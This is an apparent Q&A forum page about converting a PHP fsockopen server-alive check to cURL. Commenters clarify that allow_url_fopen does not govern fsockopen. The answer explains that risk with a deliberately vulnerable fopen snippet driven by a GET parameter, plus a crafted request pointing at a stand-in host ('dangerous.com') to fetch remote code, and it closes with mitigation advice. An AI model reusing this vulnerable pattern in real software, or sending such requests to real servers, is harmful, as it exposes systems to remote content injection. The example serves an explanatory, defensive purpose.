# Converting fsockopen() function to use cURL

Tags: php, fsockopen

Hi all I have some code that's being run through a foreach loop:

```
        if($fp = @fsockopen($value['privateip'],1935,$errCode,$errStr,.5)){   
           $value['alive'] = 'alive';
        } else {
           $value['alive'] = 'down';
        } 
        @fclose($fp);
```

It basically pings my servers at port 1935 and then changes the value in an array.  I have read php's file functions are dangerous if code injection occurs so they would probably be better off disabled.  How can I change this code to use cURL instead?

Comment: Did you try something ..?? Take a look here, it is not very difficult : http://www.php.net/manual/fr/function.curl-exec.php

Comment: Are you confusing `fsockopen` with `fopen`? I think that article just said that using `fopen` when `allow_url_fopen` was risky. However, if your codes are written properly, there are no risks.

Comment: I was under the impression that by disabling allow_url_open it also disabled fsockopen?

Comment: Also, I am pretty much a beginner as far as any type of programming goes.  I constantly worry about code injection.

Comment: `allow_url_fopen` has nothing to do with `fsockopen`.

Comment: I'll explain the risk about `fopen` on my answer, please wait a while.

Answer (score 0):

Have a look at this code:

```
<?php

$filename = @$_GET['filename'];

$fp = fopen($filename,'r');
$buffer = '';
while (!feof($fp)) {
    $buffer .= fgets($fp,2048);    
}
fclose($fp);

$fp = fopen('something_very_important_data.txt','a');
fwrite($fp,$buffer);
fclose($fp);
```

when you get a request, like:

```
http://www.yourserver.com/your_script.php?filename=http%3A%2F%2Fdangerous.com%2Fdangerous_code.txt
```

`$filename` value will be like:

```
$filename = 'http://dangerous.com/dangerous_code.txt';
```

If `allow_url_fopen` is set on, **this works**.
As you may know, this is very dangerous.
To prevent this issue, set `allow_url_fopen` off, or completely filter `$_GET`, `$_POST` and so on.